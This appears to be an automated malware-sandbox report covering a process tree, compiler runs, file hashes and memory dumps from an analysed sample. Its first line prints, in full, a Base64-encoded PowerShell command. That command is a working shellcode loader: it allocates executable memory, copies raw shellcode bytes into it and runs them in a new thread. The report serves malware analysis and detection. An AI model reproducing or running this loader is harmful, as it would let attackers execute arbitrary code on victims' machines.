"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JAB6AFcASQBTACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAegBXAEkAUwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkADkALAAwAHgAYwBjACwAMAB4AGIAZAAsADAAeABjADUALAAwAHgAMQA3ACwAMAB4ADgANAAsADAAeAA0ADIALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAZQAsADAAeAAyAGIALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADYAZQAsADAAeAAxADcALAAwAHgAMAAzACwAMAB4ADYAZQAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4ADAAMwAsADAAeAAxADMALAAwAHgANgA2ACwAMAB4AGIANwAsADAAeAA3ADcALAAwAHgAZgA0ACwAMAB4AGUAOQAsADAAeAAzADgALAAwAHgAOAA3ACwAMAB4ADAANQAsADAAeAA5ADYALAAwAHgAMAA5ACwAMAB4ADUANQAsADAAeAA4AGMALAAwAHgAYgAzACwAMAB4ADAAZQAsADAAeABkADIALAAwAHgAZABkACwAMAB4ADAAYgAsADAAeAA0ADQALAAwAHgAYgA2ACwAMAB4AGUAZAAsADAAeABlADAALAAwAHgAMAA4ACwAMAB4ADIAMgAsADAAeABkAGYALAAwAHgAMAA5ACwAMAB4ADIANwAsADAAeAAzADgALAAwAHgAMwA3ACwAMAB4AGYAOQAsADAAeAA4AGYALAAwAHgAZgA2ACwAMAB4ADYAMQAsADAAeAAzADQALAAwAHgAMwAwACwAMAB4AGEAYQAsADAAeAA1ADIALAAwAHgANQA3ACwAMAB4AGMAYwAsADAAeABiADAALAAwAHgAOAA2ACwAMAB4AGIANwAsADAAeABlAGQALAAwAHgANwBiACwAMAB4AGQAYgAsADAAeABiADYALAAwAHgAMgBhACwAMAB4AGMAYQAsADAAeAA5ADEALAAwAHgANQA3ACwAMAB4AGUANgAsADAAeAA0ADcALAAwAHgAMABiACwAMAB4AGIAOAAsADAAeAA1ADAALAAwAHgAZABjACwAMAB4AGUAZQAsADAAeAA4ADQALAAwAHgANQBmACwAMAB4ADMAMgAsADAAeAA2ADUALAAwAHgAYgA0ACwAMAB4ADIANwAsADAAeAAzADcALAAwAHgAYgBhACwAMAB4ADQAMQAsADAAeAA5ADQALAAwAHgAMwA2ACwAMAB4AGUAYgAsADAAeABmAGEALAAwAHgAYQBmACwAMAB4ADYAMAAsADAAeAAyAGIALAAwAHgANwAwACwAMAB4AGUANwAsADAAeAA4ADgALAAwAHgAMgBhACwAMAB4ADUANQAsADAAeAA3AGQALAAwAHgANgAxACwAMAB4ADUAOAAsADAAeAA2ADUALAAwAHgANABmACwAMAB4ADgAZQAsADAAeABlADgALAAwAHgAMQBlACwAMAB4ADkAYgAsADAAeABmAGIALAAwAHgAZQBhACwAMAB4AGYANgAsADAAeABkADUALAAwAHgAMwBiACwAMAB4ADIAZAAsADAAeAAzADkALAAwAHgAMQA4ACwAMAB4ADEANwAsADAAeABhAGYALAAwAHgAMAAxACwAMAB4ADEAYgAsADAAeAA4ADcALAAwAHgAYwA1ACwAMAB4ADcAOQAsADAAeAA1AGYALAAwAHgAMwBhACwAMAB4AGQAZQAsADAAeABiADkALAAwAHgAMQBkACwAMAB4AGUAMAAsADAAeAA2AGIALAAwAHgANQBlACwAMAB4ADgANQAsADAAeAA2ADMALAAwAHgAYwBiACwAMAB4AGIAYQAsADAAeAAzADcALAAwAHgAYQAwACwAMAB4ADgAYQAsADAAeAA0ADkALAAwAHgAMwBiACwAMAB4ADAAZAAsADAAeABkADgALAAwAHgAMQA2ACwAMAB4ADUAOAAsADAAeAA5ADAALAAwAHgAMABkACwAMAB4ADIAZAAsADAAeAA2ADQALAAwAHgAMQA5ACwAMAB4AGIAMAAsADAAeABlADIALAAwAHgAZQBjACwAMAB4ADUAOQAsADAAeAA5ADcALAAwAHgAMgA2ACwAMAB4AGIANAAsADAAeAAzAGEALAAwAHgAYgA2ACwAMAB4ADcAZgAsADAAeAAxADAALAAwAHgAZQBkACwAMAB4AGMANwAsADAAeAA2ADAALAAwAHgAZgBjACwAMAB4ADUAMgAsADAAeAA2ADIALAAwAHgAZQBhACwAMAB4AGUAZgAsADAAeAA4ADUALAAwAHgAMQAyACwAMAB4ADEAMwAsADAAeABmADAALAAwAHgAYQBhACwAMAB4ADQAZQAsADAAeAA4ADQALAAwAHgAMwBjACwAMAB4ADYANgAsADAAeAA3ADEALAAwAHgANQA0ACwAMAB4ADIAYgAsADAAeABmADEALAAwAHgAMAAyACwAMAB4ADYANgAsADAAeABmADQALAAwAHgAYQA5ACwAMAB4ADgAYwAsADAAeABjAGEALAAwAHgANwBkACwAMAB4ADcANwAsADAAeAA0AGEALAAwAHgANQBhACwAMAB4ADYAOQAsADAAeAA4ADgALAAwAHgAOAA0ACwAMAB4AGUANAAsADAAeABmAGEALAAwAHgANwA3ACwAMAB4ADIANQAsADAAeAAxADUALAAwAHgAZAAyACwAMAB4AGIAMwAsADAAeAA3ADEALAAwAHgANAA1ACwAMAB4ADQAYwAsADAAeAAxADIALAAwAHgAZgBhACwAMAB4ADAAZQAsADAAeAA4AGMALAAwAHgAOQBiACwAMAB4ADIAZgAsADAAeABiAGEALAAwAHgAOAA2ACwAMAB4ADAAYgAsADAAeAAxADAALAAwAHgAOQAzACwAMAB4AGMAZgAsADAAeAA0AGIALAAwAHgAZgA4ACwAMAB4AGUANgAsADAAeABlAGYALAAwAHgANAA2ACwAMAB4AGYAYwAsADAAeAA2AGYALAAwAHgAMAA5ACwAMAB4ADAAOAAsADAAeABhAGUALAAwAHgAMwBmACwAMAB4ADgANgAsADAAeABlADgALAAwAHgAMQBlACwAMAB4ADgAMAAsADAAeAA3ADYALAAwAHgAOAAwACwAMAB4ADcANAAsADAAeAAwAGYALAAwAHgAYQA4ACwAMAB4AGIAMAAsADAAeAA3ADYALAAwAHgAYwA1ACwAMAB4AGMAMQAsADAAeAA1AGEALAAwAHgAOQA5ACwAMAB4AGIAMAAsADAAeABiAGEALAAwAHgAZgAyACwAMAB4ADAAMAAsADAAeAA5ADkALAAwAHgAMwAxACwAMAB4ADYAMwAsADAAeABjAGMALAAwAHgAMwA3ACwAMAB4ADMAYwAsADAAeABhADMALAAwAHgANAA2ACwAMAB4AGIANAAsADAAeABjADAALAAwAHgANgBkACwAMAB4AGEAZgAsADAAeABiADEALAAwAHgAZAAyACwAMAB4ADEAOQAsADAAeAA1AGYALAAwAHgAOABjACwAMAB4ADgAOQAsADAAeAA4AGYALAAwAHgANgAwACwAMAB4ADMAYQAsADAAeABhADcALAAwAHgAMgBmACwAMAB4AGYANQAsADAAeABjADEALAAwAHgANgBlACwAMAB4ADcAOAAsADAAeAA2ADEALAAwAHgAYwA4ACwAMAB4ADUANwAsADAAeAA0AGUALAAwAHgAMgBlACwAMAB4ADMAMwAsADAAeABiADIALAAwAHgAYwA1ACwAMAB4AGUANwAsADAAeABhADEALAAwAHgANwBkACwAMAB4AGIAMQAsADAAeAAwADcALAAwAHgAMgA2ACwAMAB4ADcAZQAsADAAeAA0ADEALAAwAHgANQBlACwAMAB4ADIAYwAsADAAeAA3AGUALAAwAHgAMgA5ACwAMAB4ADAANgAsADAAeAAxADQALAAwAHgAMgBkACwAMAB4ADQAYwAsADAAeAA0ADkALAAwAHgAOAAxACwAMAB4ADQAMQAsADAAeABkAGQALAAwAHgAZABjACwAMAB4ADIAYQAsADAAeAAzADAALAAwAHgAYgAyACwAMAB4ADcANwAsADAAeAA0ADMALAAwAHgAYgBlACwAMAB4AGUAZAAsADAAeABiADAALAAwAHgAYwBjACwAMAB4ADQAMQAsADAAeABkADgALAAwAHgANAAwACwAMAB4ADMAMAAsADAAeAA5ADQALAAwAHgAMgA0ACwAMAB4ADMANwAsADAAeAA1ADgALAAwAHgAMgA0ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJAA4ADIAOQA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAOAAyADkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkADgAMgA5ACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fx-60yhm.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:2756

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBAD8.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBAD7.tmp"
6⤵
PID:3004

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESBAD8.tmp
Filesize
1KB

MD5
b1bb06ed74efd12d83d1fdfa7ef0d031

SHA1
75b156ea1eba597647b106684b02faab996b16a5

SHA256
42a584aa73fb3eb938d536cb1c90e0b9106d500e000e7e573d7d65f2e8d3eb7d

SHA512
6e6f685acfb62314ac5e02cbcc4ef1307e3578f71e5c0d4b2885a7ca9e4472f1b9aba3a2aa4d53db9246cd96f01f3b7971b0ba2639797a347548cdc17ab95c82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fx-60yhm.dll
Filesize
3KB

MD5
70d9342136926576285e47af897fcb88

SHA1
58ceeb161ed7dd6ecf9eb650e800ab8cc0ed4e5d

SHA256
d751d0dce5010662c3ae84d9cd7b84b4da8b827d9b781b367478691e12e488fb

SHA512
f3feed2a49cce52d2375d4990e3c34301b3da03fe5811bd7061e71e4fea73188970ae3c24006b257f729f14413f1d7a5a456f6c1a6832e312baaaebdfb8250f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\fx-60yhm.pdb
Filesize
7KB

MD5
2023a37ecddddbee5b6ac8814cdf61b4

SHA1
215f20b265d194394fe69cb5261605e16603fd91

SHA256
2c73fbfbb7d409a9b868cd4dcdb99d62fe6a9c459c97c37ef8ed03c228225455

SHA512
fb1eddd4eb8fda90192176784b9d4b0c0ea412107ef736fabef50b4a185a0c3e9ae213377a0b72bcc7f1778c00fcf48c7f33cd74b7de8b978dac6b2ec6b1e76c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\64X9VK719YV2KGYV3UUU.temp
Filesize
7KB

MD5
965d2215f9fff7348e5b99f37f487070

SHA1
14a6976ae4a3397bd8671f73880a2c58d7ee52b1

SHA256
605b39eed8022fe202c234c8c05cc695b999635efd2f170ca8d7356127dd08e2

SHA512
d5c24943cd49994f1639fc61eb3914b246eeeec4f8b8159954137f7713c8c3a9628429081dd90569031ac955fa185c9f9c59ca59abe37b9b5383c5049d2a529e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCBAD7.tmp
Filesize
652B

MD5
9227dfa86bbcb866ede418d416c7aeb9

SHA1
4be75dc4b77b743ac3fe915dc1020d9ecfffbcce

SHA256
a5a297acb8c90ce145fd83b45f5de2e4925cf37423d7e2974c19e1cd3fe69bce

SHA512
b4a0624db424b49c787744b1934817ef47b12ad211a12949167fb9932ce9b40502e08ac44d9409f14f6f1e3276c3bbba82fa1ece1521be85b70d14a67f52b293

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fx-60yhm.0.cs
Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fx-60yhm.cmdline
Filesize
309B

MD5
0075ffedc2ec2d65c2e3658f9151ee40

SHA1
5106a776782ba9a667ae7370c380e90dba523e7f

SHA256
df0b809c3f977b7e6ebe2af555b6ec721d0f5e61d9d88e240ab9108416be05a8

SHA512
d76648816277548b051a62b03b55e0a540bcea160f8d4e7955d55c6c1361da5f43cfab3aa1db23de285ac0d7d1fdf9deb4a8e6adbe5b2ff1c4b62afd654ee93d

Download Submit
memory/1676-40-0x00000000048A0000-0x00000000048A1000-memory.dmp

Filesize
4KB

Download
memory/1676-31-0x00000000048A0000-0x00000000048A1000-memory.dmp

Filesize
4KB

Download
memory/2192-10-0x000007FEF4110000-0x000007FEF4AAD000-memory.dmp

Filesize
9.6MB

Download
memory/2192-36-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2192-13-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2192-11-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2192-41-0x000007FEF4110000-0x000007FEF4AAD000-memory.dmp

Filesize
9.6MB

Download
memory/2192-8-0x000007FEF4110000-0x000007FEF4AAD000-memory.dmp

Filesize
9.6MB

Download
memory/2192-9-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2192-7-0x00000000020C0000-0x00000000020C8000-memory.dmp

Filesize
32KB

Download
memory/2192-6-0x000000001B450000-0x000000001B732000-memory.dmp

Filesize
2.9MB

Download
memory/2192-37-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2192-33-0x000007FEF4110000-0x000007FEF4AAD000-memory.dmp

Filesize
9.6MB

Download
memory/2192-35-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2192-34-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2192-12-0x00000000029F0000-0x0000000002A70000-memory.dmp

Filesize
512KB

Download
memory/2220-32-0x000007FEF6170000-0x000007FEF6B5C000-memory.dmp

Filesize
9.9MB

Download
memory/2220-1-0x000007FEF6170000-0x000007FEF6B5C000-memory.dmp

Filesize
9.9MB

Download
memory/2220-0-0x0000000001050000-0x000000000105A000-memory.dmp

Filesize
40KB

Download
memory/2220-42-0x000007FEF6170000-0x000007FEF6B5C000-memory.dmp

Filesize
9.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads